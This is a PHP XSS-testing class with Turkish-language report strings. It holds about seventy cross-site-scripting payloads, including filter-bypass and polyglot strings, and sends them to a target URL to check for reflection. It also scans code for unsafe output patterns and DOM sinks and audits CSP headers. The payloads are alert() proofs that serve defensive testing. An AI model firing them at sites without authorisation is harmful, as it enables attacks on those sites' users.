<?php

class XSSTester {
    private $test_payloads = [];
    private $test_results = [];
    
    public function __construct() {
        $this->initializePayloads();
    }
    
    private function initializePayloads() {
        $this->test_payloads = [
            '<script>alert("XSS")</script>',
            '<script>alert(1)</script>',
            '<script>alert(String.fromCharCode(88,83,83))</script>',
            '<script>confirm("XSS")</script>',
            '<script>prompt("XSS")</script>',
            
            '<img src="x" onerror="alert(1)">',
            '<img src="x" onerror="alert(\'XSS\')">',
            '<body onload="alert(1)">',
            '<input type="text" onfocus="alert(1)" autofocus>',
            '<select onfocus="alert(1)" autofocus>',
            '<textarea onfocus="alert(1)" autofocus>',
            '<keygen onfocus="alert(1)" autofocus>',
            '<video><source onerror="alert(1)">',
            '<audio src="x" onerror="alert(1)">',
            '<details open ontoggle="alert(1)">',
            
            'javascript:alert("XSS")',
            'javascript:alert(1)',
            'javascript:confirm("XSS")',
            'javascript:prompt("XSS")',
            
            'data:text/html,<script>alert("XSS")</script>',
            'data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=',
            
            '<svg onload="alert(1)">',
            '<svg><script>alert("XSS")</script></svg>',
            '<svg/onload=alert("XSS")>',
            
            '<math><mi//xlink:href="data:x,<script>alert(1)</script>">',
            '<table background="javascript:alert(1)">',
            '<object data="javascript:alert(1)">',
            '<embed src="javascript:alert(1)">',
            
            '<scr<script>ipt>alert(1)</scr</script>ipt>',
            '<script>alert(String.fromCharCode(88,83,83))</script>',
            '<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>',
            '<script>window["alert"](1)</script>',
            '<script>top["alert"](1)</script>',
            '<script>parent["alert"](1)</script>',
            '<script>self["alert"](1)</script>',
            
            '%3Cscript%3Ealert(1)%3C/script%3E',
            '&lt;script&gt;alert(1)&lt;/script&gt;',
            '&#60;script&#62;alert(1)&#60;/script&#62;',
            '&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;',
            
            '<SCRIPT>alert(1)</SCRIPT>',
            '<ScRiPt>alert(1)</ScRiPt>',
            '<script>ALERT(1)</script>',
            '<script>Alert(1)</script>',
            
            '<script >alert(1)</script>',
            '<script\t>alert(1)</script>',
            '<script\n>alert(1)</script>',
            '<script\r>alert(1)</script>',
            '<script/src=data:,alert(1)>',
            
            '<style>body{background:url("javascript:alert(1)")}</style>',
            '<link rel="stylesheet" href="javascript:alert(1)">',
            '<style>@import"javascript:alert(1)";</style>',
            
            '{{alert(1)}}',
            '${alert(1)}',
            '#{alert(1)}',
            
            '{{constructor.constructor("alert(1)")()}}',
            '{{$eval.constructor("alert(1)")()}}',
            '{{$on.constructor("alert(1)")()}}',
            
            'javascript:/*--></title></style></textarea></script></xmp><svg/onload="+/"/+/onmouseover=1/+/[*/[]/+alert(1)//">',
            
            'javascript:/*--></title></style></textarea></script></xmp><svg/onload="+/"/+/onmouseover=1/+/[*/[]/+alert(1)//">',
            'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>',
            
            '<svg/onload=alert(1)>',
            '<img src=x onerror=alert(1)>',
            '<iframe src=javascript:alert(1)>',
            '<object data=javascript:alert(1)>',
            '<embed src=javascript:alert(1)>',
            '<form><button formaction=javascript:alert(1)>',
            '<input type=image src=x onerror=alert(1)>',
            '<isindex type=image src=x onerror=alert(1)>',
            
            '\';alert(1);//',
            '\";alert(1);//',
            '</script><script>alert(1)</script>',
            '</title><script>alert(1)</script>',
            '</textarea><script>alert(1)</script>',
            '</style><script>alert(1)</script>',
            '</noscript><script>alert(1)</script>'
        ];
    }
    
    public function testEndpoint($url, $parameters = []) {
        $results = [
            'url' => $url,
            'vulnerable' => false,
            'vulnerabilities' => [],
            'test_count' => 0,
            'reflected_payloads' => [],
            'stored_payloads' => [],
            'dom_vulnerabilities' => []
        ];
        
        foreach ($this->test_payloads as $payload) {
            foreach ($parameters as $param) {
                $results['test_count']++;
                $test_result = $this->sendTestRequest($url, $param, $payload);
                
                if ($test_result['vulnerable']) {
                    $results['vulnerable'] = true;
                    $results['vulnerabilities'][] = [
                        'parameter' => $param,
                        'payload' => $payload,
                        'type' => $test_result['type'],
                        'evidence' => $test_result['evidence']
                    ];
                    
                    if ($test_result['type'] === 'reflected') {
                        $results['reflected_payloads'][] = $payload;
                    } elseif ($test_result['type'] === 'stored') {
                        $results['stored_payloads'][] = $payload;
                    } elseif ($test_result['type'] === 'dom') {
                        $results['dom_vulnerabilities'][] = $payload;
                    }
                }
            }
        }
        
        return $results;
    }
    
    private function sendTestRequest($url, $parameter, $payload) {
        $result = [
            'vulnerable' => false,
            'type' => '',
            'evidence' => '',
            'response' => ''
        ];
        
        try {
            $post_data = [$parameter => $payload];
            $context = stream_context_create([
                'http' => [
                    'method' => 'POST',
                    'header' => 'Content-type: application/x-www-form-urlencoded',
                    'content' => http_build_query($post_data),
                    'timeout' => 10
                ]
            ]);
            
            $response = @file_get_contents($url, false, $context);
            $result['response'] = $response;
            
            if (strpos($response, $payload) !== false) {
                $result['vulnerable'] = true;
                $result['type'] = 'reflected';
                $result['evidence'] = 'Payload reflected in response';
            }
            
            if (preg_match('/<script[^>]*>.*' . preg_quote($payload, '/') . '.*<\/script>/i', $response)) {
                $result['vulnerable'] = true;
                $result['type'] = 'reflected';
                $result['evidence'] = 'Payload executed in script context';
            }
            
            if (preg_match('/on\w+\s*=\s*["\']?[^"\']*' . preg_quote($payload, '/') . '/i', $response)) {
                $result['vulnerable'] = true;
                $result['type'] = 'reflected';
                $result['evidence'] = 'Payload in event handler';
            }
            
            if (preg_match('/javascript:[^"\']*' . preg_quote($payload, '/') . '/i', $response)) {
                $result['vulnerable'] = true;
                $result['type'] = 'reflected';
                $result['evidence'] = 'Payload in javascript: context';
            }
            
        } catch (Exception $e) {
        }
        
        return $result;
    }
    
    public function analyzeCode($directory = null) {
        if (!$directory) {
            $directory = __DIR__ . '/../pages/';
        }
        
        $results = [
            'scanned_files' => [],
            'vulnerable_patterns' => [],
            'safe_patterns' => [],
            'recommendations' => []
        ];
        
        $php_files = glob($directory . '*.php');
        
        foreach ($php_files as $file) {
            $results['scanned_files'][] = basename($file);
            $content = file_get_contents($file);
            
            $vulnerable_patterns = [
                '/echo\s+\$_GET\[/' => 'Direct echo of $_GET parameter',
                '/echo\s+\$_POST\[/' => 'Direct echo of $_POST parameter',
                '/print\s+\$_REQUEST\[/' => 'Direct print of $_REQUEST parameter',
                '/printf\s*\(\s*\$_/' => 'Direct printf of user input',
                '/<script[^>]*>\s*\$_/' => 'User input in script tag',
                '/innerHTML\s*=\s*["\']?\$_/' => 'User input in innerHTML',
                '/document\.write\s*\(\s*["\']?\$_/' => 'User input in document.write',
                '/eval\s*\(\s*["\']?\$_/' => 'User input in eval',
                '/on\w+\s*=\s*["\'][^"\']*\$_/' => 'User input in event handler'
            ];
            
            foreach ($vulnerable_patterns as $pattern => $description) {
                if (preg_match($pattern, $content)) {
                    $results['vulnerable_patterns'][] = [
                        'file' => basename($file),
                        'pattern' => $description,
                        'line' => $this->findLineNumber($content, $pattern)
                    ];
                }
            }
            
            $safe_patterns = [
                '/htmlspecialchars\s*\(/' => 'htmlspecialchars() usage',
                '/htmlentities\s*\(/' => 'htmlentities() usage',
                '/strip_tags\s*\(/' => 'strip_tags() usage',
                '/filter_var\s*\([^,]+,\s*FILTER_SANITIZE/' => 'filter_var() sanitization',
                '/Content-Security-Policy/' => 'CSP header usage',
                '/X-XSS-Protection/' => 'X-XSS-Protection header'
            ];
            
            foreach ($safe_patterns as $pattern => $description) {
                if (preg_match($pattern, $content)) {
                    $results['safe_patterns'][] = [
                        'file' => basename($file),
                        'pattern' => $description
                    ];
                }
            }
        }
        
        if (!empty($results['vulnerable_patterns'])) {
            $results['recommendations'][] = 'Kullanıcı girdilerini htmlspecialchars() ile filtreleyin';
            $results['recommendations'][] = 'Content Security Policy (CSP) header kullanın';
            $results['recommendations'][] = 'X-XSS-Protection header ekleyin';
            $results['recommendations'][] = 'Input validation ve output encoding uygulayın';
            $results['recommendations'][] = 'Template engine kullanarak otomatik escaping sağlayın';
        }
        
        return $results;
    }
    
    public function analyzeDOMXSS($directory = null) {
        if (!$directory) {
            $directory = __DIR__ . '/../';
        }
        
        $results = [
            'scanned_files' => [],
            'dom_sinks' => [],
            'dom_sources' => [],
            'potential_vulnerabilities' => []
        ];
        
        $files = array_merge(
            glob($directory . '**/*.js'),
            glob($directory . '**/*.html'),
            glob($directory . '**/*.php')
        );
        
        foreach ($files as $file) {
            $results['scanned_files'][] = basename($file);
            $content = file_get_contents($file);
            
            $dom_sources = [
                'location.href',
                'location.search',
                'location.hash',
                'document.URL',
                'document.documentURI',
                'document.referrer',
                'window.name',
                'history.pushState',
                'history.replaceState',
                'localStorage',
                'sessionStorage'
            ];
            
            foreach ($dom_sources as $source) {
                if (strpos($content, $source) !== false) {
                    $results['dom_sources'][] = [
                        'file' => basename($file),
                        'source' => $source,
                        'line' => $this->findLineNumber($content, '/' . preg_quote($source, '/') . '/')
                    ];
                }
            }
            
            $dom_sinks = [
                'innerHTML',
                'outerHTML',
                'document.write',
                'document.writeln',
                'eval',
                'setTimeout',
                'setInterval',
                'Function',
                'execScript',
                'msSetImmediate',
                'range.createContextualFragment',
                'crypto.generateCRMFRequest'
            ];
            
            foreach ($dom_sinks as $sink) {
                if (strpos($content, $sink) !== false) {
                    $results['dom_sinks'][] = [
                        'file' => basename($file),
                        'sink' => $sink,
                        'line' => $this->findLineNumber($content, '/' . preg_quote($sink, '/') . '/')
                    ];
                }
            }
        }
        
        foreach ($results['dom_sources'] as $source) {
            foreach ($results['dom_sinks'] as $sink) {
                if ($source['file'] === $sink['file']) {
                    $results['potential_vulnerabilities'][] = [
                        'file' => $source['file'],
                        'source' => $source['source'],
                        'sink' => $sink['sink'],
                        'risk' => 'high'
                    ];
                }
            }
        }
        
        return $results;
    }
    
    private function findLineNumber($content, $pattern) {
        $lines = explode("\n", $content);
        foreach ($lines as $line_num => $line) {
            if (preg_match($pattern, $line)) {
                return $line_num + 1;
            }
        }
        return 0;
    }
    
    public function analyzeCSP() {
        $results = [
            'csp_present' => false,
            'csp_header' => '',
            'directives' => [],
            'vulnerabilities' => [],
            'recommendations' => []
        ];
        
        if (function_exists('apache_response_headers')) {
            $headers = apache_response_headers();
            if (isset($headers['Content-Security-Policy'])) {
                $results['csp_present'] = true;
                $results['csp_header'] = $headers['Content-Security-Policy'];
                
                $directives = explode(';', $results['csp_header']);
                foreach ($directives as $directive) {
                    $parts = explode(' ', trim($directive), 2);
                    if (count($parts) === 2) {
                        $results['directives'][$parts[0]] = $parts[1];
                    }
                }
                
                $this->checkCSPVulnerabilities($results);
            }
        }
        
        if (!$results['csp_present']) {
            $results['vulnerabilities'][] = 'CSP header mevcut değil';
            $results['recommendations'][] = 'Content-Security-Policy header ekleyin';
        }
        
        return $results;
    }
    
    private function checkCSPVulnerabilities(&$results) {
        $directives = $results['directives'];
        
        foreach (['script-src', 'style-src'] as $directive) {
            if (isset($directives[$directive]) && strpos($directives[$directive], "'unsafe-inline'") !== false) {
                $results['vulnerabilities'][] = "Güvensiz $directive: 'unsafe-inline' kullanılıyor";
            }
        }
        
        if (isset($directives['script-src']) && strpos($directives['script-src'], "'unsafe-eval'") !== false) {
            $results['vulnerabilities'][] = "Güvensiz script-src: 'unsafe-eval' kullanılıyor";
        }
        
        foreach ($directives as $directive => $value) {
            if (strpos($value, '*') !== false && $directive !== 'img-src') {
                $results['vulnerabilities'][] = "Güvensiz $directive: wildcard (*) kullanılıyor";
            }
        }
        
        foreach (['script-src', 'object-src'] as $directive) {
            if (isset($directives[$directive]) && strpos($directives[$directive], 'data:') !== false) {
                $results['vulnerabilities'][] = "Güvensiz $directive: data: URI'leri izin veriliyor";
            }
        }
        
        if (empty($results['vulnerabilities'])) {
            $results['recommendations'][] = 'CSP konfigürasyonu güvenli görünüyor';
        } else {
            $results['recommendations'][] = 'CSP direktiflerini daha kısıtlayıcı hale getirin';
            $results['recommendations'][] = 'Nonce veya hash tabanlı CSP kullanmayı düşünün';
        }
    }
    
    public function generateHTMLReport($test_results) {
        $html = '<div class="xss-test-report">';
        $html .= '<h3>XSS Test Raporu</h3>';
        
        if (isset($test_results['url'])) {
            $html .= '<h4>Endpoint Test Sonuçları</h4>';
            $html .= '<p><strong>Test Edilen URL:</strong> ' . htmlspecialchars($test_results['url']) . '</p>';
            $html .= '<p><strong>Toplam Test:</strong> ' . $test_results['test_count'] . '</p>';
            $html .= '<p><strong>Durum:</strong> ';
            
            if ($test_results['vulnerable']) {
                $html .= '<span class="badge bg-danger">VULNERABLE</span>';
            } else {
                $html .= '<span class="badge bg-success">SAFE</span>';
            }
            $html .= '</p>';
            
            if (!empty($test_results['vulnerabilities'])) {
                $html .= '<h5>Bulunan XSS Açıkları</h5>';
                $html .= '<div class="table-responsive">';
                $html .= '<table class="table table-striped">';
                $html .= '<thead><tr><th>Parametre</th><th>Tür</th><th>Payload</th><th>Kanıt</th></tr></thead>';
                $html .= '<tbody>';
                
                foreach ($test_results['vulnerabilities'] as $vuln) {
                    $html .= '<tr>';
                    $html .= '<td>' . htmlspecialchars($vuln['parameter']) . '</td>';
                    $html .= '<td><span class="badge bg-warning">' . strtoupper($vuln['type']) . '</span></td>';
                    $html .= '<td><code>' . htmlspecialchars($vuln['payload']) . '</code></td>';
                    $html .= '<td>' . htmlspecialchars($vuln['evidence']) . '</td>';
                    $html .= '</tr>';
                }
                
                $html .= '</tbody></table>';
                $html .= '</div>';
            }
        } else {
            $html .= '<h4>Kod Analizi Sonuçları</h4>';
            $html .= '<p><strong>Taranan Dosyalar:</strong> ' . count($test_results['scanned_files'] ?? []) . '</p>';
            
            if (!empty($test_results['vulnerable_patterns'])) {
                $html .= '<h5>XSS Açıkları</h5>';
                $html .= '<div class="table-responsive">';
                $html .= '<table class="table table-striped">';
                $html .= '<thead><tr><th>Dosya</th><th>Açıklama</th><th>Satır</th></tr></thead>';
                $html .= '<tbody>';
                
                foreach ($test_results['vulnerable_patterns'] as $pattern) {
                    $html .= '<tr>';
                    $html .= '<td>' . htmlspecialchars($pattern['file']) . '</td>';
                    $html .= '<td>' . htmlspecialchars($pattern['pattern']) . '</td>';
                    $html .= '<td>' . $pattern['line'] . '</td>';
                    $html .= '</tr>';
                }
                
                $html .= '</tbody></table>';
                $html .= '</div>';
            }
            
            if (!empty($test_results['recommendations'])) {
                $html .= '<h5>Öneriler</h5>';
                $html .= '<ul>';
                foreach ($test_results['recommendations'] as $recommendation) {
                    $html .= '<li>' . htmlspecialchars($recommendation) . '</li>';
                }
                $html .= '</ul>';
            }
        }
        
        $html .= '</div>';
        return $html;
    }
}
?>